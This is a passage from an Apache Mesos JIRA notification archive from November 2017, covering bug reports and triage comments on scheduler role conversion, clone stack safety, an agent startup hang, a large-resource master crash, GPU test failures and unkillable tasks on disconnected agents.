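This keeps the master's offers roughly in sync with reality, but it does not remove the underlying issue this ticket describes: outstanding offers are not rescinded when executors on the agent exit.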



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8200) Suppressed roles are not honoured for v1 scheduler subscribe requests.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8200?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8200:
--
Priority: Critical  (was: Major)

> Suppressed roles are not honoured for v1 scheduler subscribe requests.
> --
>
> Key: MESOS-8200
> URL: https://issues.apache.org/jira/browse/MESOS-8200
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler api, scheduler driver
>Reporter: Alexander Rukletsov
>Assignee: Yan Xu
>Priority: Critical
>
> When triaging MESOS-7996 I found that the 
> {{Call.subscribe.suppressed_roles}} field is empty when the master processes 
> the request from a v1 HTTP scheduler. More precisely, [this 
> conversion|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/master/http.cpp#L969]
>  wipes the field. This is likely because this conversion relies on a general 
> [protobuf conversion 
> utility|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/internal/devolve.cpp#L28-L50],
>  which fails to copy {{suppressed_roles}} because they have different tags, 
> compare 
> [v0|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/scheduler/scheduler.proto#L271]
>  and 
> [v1|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/v1/scheduler/scheduler.proto#L258].
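A condensed illustration of why the wire-format round trip drops the field. This is a generic sketch of that style of conversion, not the actual {{devolve}} code: protobuf matches fields by tag number, so a field numbered differently in the v1 and unversioned messages never makes it across.
{code:cpp}
#include <google/protobuf/message.h>

// Generic serialize/parse based conversion between two protobuf types that
// share (most of) their wire format. Fields are matched by tag number, so if
// `suppressed_roles` is, say, tag 5 in `M` but tag 6 in `T`, its bytes never
// land in T.suppressed_roles and the field comes out empty.
template <typename T, typename M>
T convertByWireFormat(const M& message)
{
  T result;
  result.ParsePartialFromString(message.SerializePartialAsString());
  return result;
}
{code}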



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8200) Suppressed roles are not honoured for v1 scheduler subscribe requests.

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8200?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250149#comment-16250149
 ] 

Vinod Kone commented on MESOS-8200:
---

[~xujyan] Are you working on this? Seems pretty critical given the feature 
doesn't work.

> Suppressed roles are not honoured for v1 scheduler subscribe requests.
> --
>
> Key: MESOS-8200
> URL: https://issues.apache.org/jira/browse/MESOS-8200
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler api, scheduler driver
>Reporter: Alexander Rukletsov
>Assignee: Yan Xu
>Priority: Critical
>
> When triaging MESOS-7996 I found that the 
> {{Call.subscribe.suppressed_roles}} field is empty when the master processes 
> the request from a v1 HTTP scheduler. More precisely, [this 
> conversion|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/master/http.cpp#L969]
>  wipes the field. This is likely because this conversion relies on a general 
> [protobuf conversion 
> utility|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/internal/devolve.cpp#L28-L50],
>  which fails to copy {{suppressed_roles}} because they have different tags, 
> compare 
> [v0|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/scheduler/scheduler.proto#L271]
>  and 
> [v1|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/v1/scheduler/scheduler.proto#L258].



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8159:
--
Priority: Critical  (was: Trivial)

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
>Priority: Critical
>
> In {{ns::clone}}, the first child calls {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.
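For contrast, the usual way to avoid that is to allocate the child stack explicitly up front and hand it to {{clone(2)}}, so nothing in the child path needs {{malloc}}. A standalone sketch of that pattern using the plain Linux API (an illustration, not the stout/Mesos fix):
{code:cpp}
#include <sched.h>      // clone
#include <sys/mman.h>   // mmap, munmap
#include <sys/wait.h>   // waitpid
#include <csignal>      // SIGCHLD
#include <cstdio>       // perror

static int child(void*) { return 0; }

int main()
{
  const size_t size = 8 * 1024 * 1024;

  // Pre-allocate the child stack; no allocation happens inside the child.
  void* stack = mmap(nullptr, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
  if (stack == MAP_FAILED) { perror("mmap"); return 1; }

  // The stack grows down on x86-64, so pass the high end to clone().
  pid_t pid = clone(&child, static_cast<char*>(stack) + size, SIGCHLD, nullptr);
  if (pid == -1) { perror("clone"); return 1; }

  waitpid(pid, nullptr, 0);
  munmap(stack, size);
  return 0;
}
{code}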



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8159:
--
Fix Version/s: 1.4.1

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
>Priority: Critical
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child calls {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250152#comment-16250152
 ] 

Vinod Kone commented on MESOS-8159:
---

[~abudnik] can you take a look?

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
>Priority: Critical
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child calls {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8137) Mesos agent can hang during startup.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8137?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8137:
--
Priority: Critical  (was: Major)

> Mesos agent can hang during startup.
> 
>
> Key: MESOS-8137
> URL: https://issues.apache.org/jira/browse/MESOS-8137
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.4.0
>Reporter: Jie Yu
>Priority: Critical
>
> Environment:
> Linux dcos-agentdisks-as1-1100-2 4.11.0-1011-azure #11-Ubuntu SMP Tue Sep 19 
> 19:03:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
> {noformat}
> #0  __lll_lock_wait_private () at 
> ../sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:95
> #1  0x7f132b856f7b in __malloc_fork_lock_parent () at arena.c:155
> #2  0x7f132b89f5da in __libc_fork () at ../sysdeps/nptl/fork.c:131
> #3  0x7f132b842350 in _IO_new_proc_open (fp=fp@entry=0xf1282b84e0, 
> command=command@entry=0xf1282b6ea8 “logrotate --help > /dev/null”, 
> mode=, mode@entry=0xf1275fb0f2 “r”)
> at iopopen.c:180
> #4  0x7f132b84265c in _IO_new_popen (command=0xf1282b6ea8 “logrotate 
> --help > /dev/null”, mode=0xf1275fb0f2 “r”) at iopopen.c:296
> #5  0x00f1275e622a in Try os::shell<>(std::string 
> const&) ()
> #6  0x7f130fdbae37 in 
> mesos::journald::flags::Flags()::{lambda(std::string 
> const&)#2}::operator()(std::string const&) const (value=..., 
> __closure=)
> at /pkg/src/mesos-modules/journald/lib_journald.hpp:153
> #7  void flags::FlagsBase::add [10], mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}::operator()(flags::FlagsBase 
> const) const (base=..., __closure=) at 
> /opt/mesosphere/active/mesos/include/stout/flags/flags.hpp:399
> #8  std::_Function_handler (flags::FlagsBase const&), void 
> flags::FlagsBase::add mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}>::_M_invoke(std::_Any_data 
> const&, flags::FlagsBase const&) (__functor=..., __args#0=...) at 
> /usr/include/c++/4.8/functional:2057
> #9  0x00f1275f1db7 in flags::FlagsBase::load(Multimap Option >&, bool, bool, Option const&) ()
> #10 0x00f1275f395f in flags::FlagsBase::load(std::map std::string, std::less, std::allocator const, std::string> > > const&, bool, Option const&) ()
> #11 0x7f130fdb0adc in __lambda104::operator() (parameters=..., 
> __closure=) at 
> /pkg/src/mesos-modules/journald/lib_journald.cpp:425
> #12 0x7f132d69ed23 in 
> mesos::slave::ContainerLogger::create(Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #13 0x7f132d848de5 in 
> mesos::internal::slave::DockerContainerizer::create(mesos::internal::slave::Flags
>  const&, mesos::internal::slave::Fetcher*, 
> Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #14 0x7f132d830862 in 
> mesos::internal::slave::Containerizer::create(mesos::internal::slave::Flags 
> const&, bool, mesos::internal::slave::Fetcher*, mesos::SecretResolver*) ()
>from /opt/mesosphere/lib/libmesos-1.4.0.so
> #15 0x00f1275deb68 in main ()
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8137) Mesos agent can hang during startup.

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8137?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250156#comment-16250156
 ] 

Vinod Kone commented on MESOS-8137:
---

[~abudnik] can you take a look at this when you have some time?

> Mesos agent can hang during startup.
> 
>
> Key: MESOS-8137
> URL: https://issues.apache.org/jira/browse/MESOS-8137
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.4.0
>Reporter: Jie Yu
>Priority: Critical
>
> Environment:
> Linux dcos-agentdisks-as1-1100-2 4.11.0-1011-azure #11-Ubuntu SMP Tue Sep 19 
> 19:03:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
> {noformat}
> #0  __lll_lock_wait_private () at 
> ../sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:95
> #1  0x7f132b856f7b in __malloc_fork_lock_parent () at arena.c:155
> #2  0x7f132b89f5da in __libc_fork () at ../sysdeps/nptl/fork.c:131
> #3  0x7f132b842350 in _IO_new_proc_open (fp=fp@entry=0xf1282b84e0, 
> command=command@entry=0xf1282b6ea8 “logrotate --help > /dev/null”, 
> mode=, mode@entry=0xf1275fb0f2 “r”)
> at iopopen.c:180
> #4  0x7f132b84265c in _IO_new_popen (command=0xf1282b6ea8 “logrotate 
> --help > /dev/null”, mode=0xf1275fb0f2 “r”) at iopopen.c:296
> #5  0x00f1275e622a in Try os::shell<>(std::string 
> const&) ()
> #6  0x7f130fdbae37 in 
> mesos::journald::flags::Flags()::{lambda(std::string 
> const&)#2}::operator()(std::string const&) const (value=..., 
> __closure=)
> at /pkg/src/mesos-modules/journald/lib_journald.hpp:153
> #7  void flags::FlagsBase::add [10], mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}::operator()(flags::FlagsBase 
> const) const (base=..., __closure=) at 
> /opt/mesosphere/active/mesos/include/stout/flags/flags.hpp:399
> #8  std::_Function_handler (flags::FlagsBase const&), void 
> flags::FlagsBase::add mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}>::_M_invoke(std::_Any_data 
> const&, flags::FlagsBase const&) (__functor=..., __args#0=...) at 
> /usr/include/c++/4.8/functional:2057
> #9  0x00f1275f1db7 in flags::FlagsBase::load(Multimap Option >&, bool, bool, Option const&) ()
> #10 0x00f1275f395f in flags::FlagsBase::load(std::map std::string, std::less, std::allocator const, std::string> > > const&, bool, Option const&) ()
> #11 0x7f130fdb0adc in __lambda104::operator() (parameters=..., 
> __closure=) at 
> /pkg/src/mesos-modules/journald/lib_journald.cpp:425
> #12 0x7f132d69ed23 in 
> mesos::slave::ContainerLogger::create(Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #13 0x7f132d848de5 in 
> mesos::internal::slave::DockerContainerizer::create(mesos::internal::slave::Flags
>  const&, mesos::internal::slave::Fetcher*, 
> Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #14 0x7f132d830862 in 
> mesos::internal::slave::Containerizer::create(mesos::internal::slave::Flags 
> const&, bool, mesos::internal::slave::Fetcher*, mesos::SecretResolver*) ()
>from /opt/mesosphere/lib/libmesos-1.4.0.so
> #15 0x00f1275deb68 in main ()
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8129:
-

Assignee: Benjamin Mahler

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order 
> of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}
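The startup validation suggested a couple of paragraphs up could be as simple as the check below. Everything here is a hypothetical sketch built from the ticket's suggestion (including the 10^12 bound), not an implemented agent flag:
{code:cpp}
#include <cmath>
#include <iostream>
#include <string>

// Suggested upper bound for scalar resource values; the ticket explicitly
// asks for this number to be verified against the fixed-point details.
const double MAX_SCALAR_RESOURCE = 1e12;

bool validateScalarResource(const std::string& name, double value)
{
  if (!std::isfinite(value) || value < 0 || value > MAX_SCALAR_RESOURCE) {
    std::cerr << "Refusing to start: resource '" << name << "' has value "
              << value << ", outside the supported range" << std::endl;
    return false;
  }
  return true;
}

int main()
{
  // Note: the reported capacity, 429496729500, is below 1e12 and would still
  // pass this particular bound -- another reason the threshold needs review.
  bool accepted = validateScalarResource("thing", 429496729500.0);
  bool rejected = !validateScalarResource("thing", 4.3e12);
  return (accepted && rejected) ? 0 : 1;
}
{code}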



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8123) GPU tests are failing due to TASK_STARTING.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8123?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8123:
-

Assignee: Alexander Rukletsov

> GPU tests are failing due to TASK_STARTING.
> ---
>
> Key: MESOS-8123
> URL: https://issues.apache.org/jira/browse/MESOS-8123
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jie Yu
>Assignee: Alexander Rukletsov
>
> For instance: NvidiaGpuTest.ROOT_CGROUPS_NVIDIA_GPU_VerifyDeviceAccess
> {noformat}
> I1020 22:18:46.180371  1480 exec.cpp:237] Executor registered on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> I1020 22:18:46.185027  1486 executor.cpp:171] Received SUBSCRIBED event
> I1020 22:18:46.186005  1486 executor.cpp:175] Subscribed executor on core-dev
> I1020 22:18:46.186189  1486 executor.cpp:171] Received LAUNCH event
> I1020 22:18:46.188908  1486 executor.cpp:637] Starting task 
> 3c08cf78-575d-4813-82b6-3ace272db35e
> I1020 22:18:46.192939  1316 slave.cpp:4407] Handling status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fra
> mework ca0e7b44-c621-4442-a62e-15f7bf02064b- from 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.196228  1330 status_update_manager.cpp:323] Received status 
> update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace
> 272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.197510  1329 slave.cpp:4888] Forwarding the update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fram
> ework ca0e7b44-c621-4442-a62e-15f7bf02064b- to master@10.0.49.2:34819
> I1020 22:18:46.197927  1329 slave.cpp:4798] Sending acknowledgement for 
> status update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for 
> task 3c08cf78-575d-4813-82b6-
> 3ace272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b- to 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.198098  1332 master.cpp:6998] Status update TASK_STARTING 
> (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework c
> a0e7b44-c621-4442-a62e-15f7bf02064b- from agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0 at slave(1)@10.0.49.2:34819 (core-dev)
> I1020 22:18:46.198187  1332 master.cpp:7060] Forwarding status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of 
> framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.198463  1332 master.cpp:9162] Updating the state of task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework 
> ca0e7b44-c621-4442-a62e-15f7bf02064b- (latest state:
>  TASK_STARTING, status update state: TASK_STARTING)
> I1020 22:18:46.199198  1331 master.cpp:5566] Processing ACKNOWLEDGE call 
> 87cee290-b2fe-4459-9b75-b9f03aab6492 for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework ca0e7b44-
> c621-4442-a62e-15f7bf02064b- (default) at 
> scheduler-f2b66689-382a-4b8c-bdc9-978cff922409@10.0.49.2:34819 on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> /home/jie/workspace/mesos/src/tests/containerizer/nvidia_gpu_isolator_tests.cpp:142:
>  Failure
>   Expected: TASK_RUNNING
> To be equal to: statusRunning1->state()
>   Which is: TASK_STARTING
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8123) GPU tests are failing due to TASK_STARTING.

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8123?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250161#comment-16250161
 ] 

Vinod Kone commented on MESOS-8123:
---

[~alexr] can you close it?

> GPU tests are failing due to TASK_STARTING.
> ---
>
> Key: MESOS-8123
> URL: https://issues.apache.org/jira/browse/MESOS-8123
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jie Yu
>Assignee: Alexander Rukletsov
>
> For instance: NvidiaGpuTest.ROOT_CGROUPS_NVIDIA_GPU_VerifyDeviceAccess
> {noformat}
> I1020 22:18:46.180371  1480 exec.cpp:237] Executor registered on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> I1020 22:18:46.185027  1486 executor.cpp:171] Received SUBSCRIBED event
> I1020 22:18:46.186005  1486 executor.cpp:175] Subscribed executor on core-dev
> I1020 22:18:46.186189  1486 executor.cpp:171] Received LAUNCH event
> I1020 22:18:46.188908  1486 executor.cpp:637] Starting task 
> 3c08cf78-575d-4813-82b6-3ace272db35e
> I1020 22:18:46.192939  1316 slave.cpp:4407] Handling status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fra
> mework ca0e7b44-c621-4442-a62e-15f7bf02064b- from 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.196228  1330 status_update_manager.cpp:323] Received status 
> update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace
> 272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.197510  1329 slave.cpp:4888] Forwarding the update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fram
> ework ca0e7b44-c621-4442-a62e-15f7bf02064b- to master@10.0.49.2:34819
> I1020 22:18:46.197927  1329 slave.cpp:4798] Sending acknowledgement for 
> status update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for 
> task 3c08cf78-575d-4813-82b6-
> 3ace272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b- to 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.198098  1332 master.cpp:6998] Status update TASK_STARTING 
> (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework c
> a0e7b44-c621-4442-a62e-15f7bf02064b- from agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0 at slave(1)@10.0.49.2:34819 (core-dev)
> I1020 22:18:46.198187  1332 master.cpp:7060] Forwarding status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of 
> framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.198463  1332 master.cpp:9162] Updating the state of task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework 
> ca0e7b44-c621-4442-a62e-15f7bf02064b- (latest state:
>  TASK_STARTING, status update state: TASK_STARTING)
> I1020 22:18:46.199198  1331 master.cpp:5566] Processing ACKNOWLEDGE call 
> 87cee290-b2fe-4459-9b75-b9f03aab6492 for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework ca0e7b44-
> c621-4442-a62e-15f7bf02064b- (default) at 
> scheduler-f2b66689-382a-4b8c-bdc9-978cff922409@10.0.49.2:34819 on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> /home/jie/workspace/mesos/src/tests/containerizer/nvidia_gpu_isolator_tests.cpp:142:
>  Failure
>   Expected: TASK_RUNNING
> To be equal to: statusRunning1->state()
>   Which is: TASK_STARTING
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8111) Mesos sees task as running, but cannot kill it because the agent is offline

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8111?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250166#comment-16250166
 ] 

Vinod Kone commented on MESOS-8111:
---

What framework are you using? I'm assuming Marathon because you are using DC/OS.
 
There is a default rate limit of 1 in 20 min in DC/OS for the master to mark a 
disconnected agent as unreachable. If you have more than one agent disconnected 
/ scaled down at the same time, it would take quite a while for the master to 
recognize that.

Also, can you share the master, scheduler, and agent logs from around the time 
of the specific task and the disconnection? That would help us diagnose this 
better.


> Mesos sees task as running, but cannot kill it because the agent is offline
> ---
>
> Key: MESOS-8111
> URL: https://issues.apache.org/jira/browse/MESOS-8111
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.2.3
> Environment: DC/OS 1.9.4
>Reporter: Cosmin Lehene
>
> After scaling down a cluster, the master is reporting a task as running 
> although the slave is long gone.
> At the same time, it reports that it cannot kill the task because the agent 
> is offline:
> {noformat}
> I1018 16:55:22.00  6976 master.cpp:4913] Processing KILL call for task 
> 'spark.7b59a77b-b353-11e7-addd-b29ecbf071e1' of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101
> W1018 16:55:22.00  6976 master.cpp:5000] Cannot kill task 
> spark.7b59a77b-b353-11e7-addd-b29ecbf071e1 of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101 because the 
> agent 4d2a982a-0e62-4471-88e8-8df9cc0ae437-S129 at slave(1)@10.0.0.81:5051 
> (10.0.0.81) is disconnected. Kill will be retried if the agent re-registers
> {noformat}
> Clearly, if the agent is offline, the task is also not running. Also, it is 
> not clear that waiting indefinitely for an agent to recover is a good strategy.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8111) Mesos sees task as running, but cannot kill it because the agent is offline

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8111?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8111:
-

Assignee: Vinod Kone

> Mesos sees task as running, but cannot kill it because the agent is offline
> ---
>
> Key: MESOS-8111
> URL: https://issues.apache.org/jira/browse/MESOS-8111
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.2.3
> Environment: DC/OS 1.9.4
>Reporter: Cosmin Lehene
>Assignee: Vinod Kone
>
> After scaling down a cluster, the master is reporting a task as running 
> although the slave is long gone.
> At the same time, it reports that it cannot kill the task because the agent 
> is offline:
> {noformat}
> I1018 16:55:22.00  6976 master.cpp:4913] Processing KILL call for task 
> 'spark.7b59a77b-b353-11e7-addd-b29ecbf071e1' of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
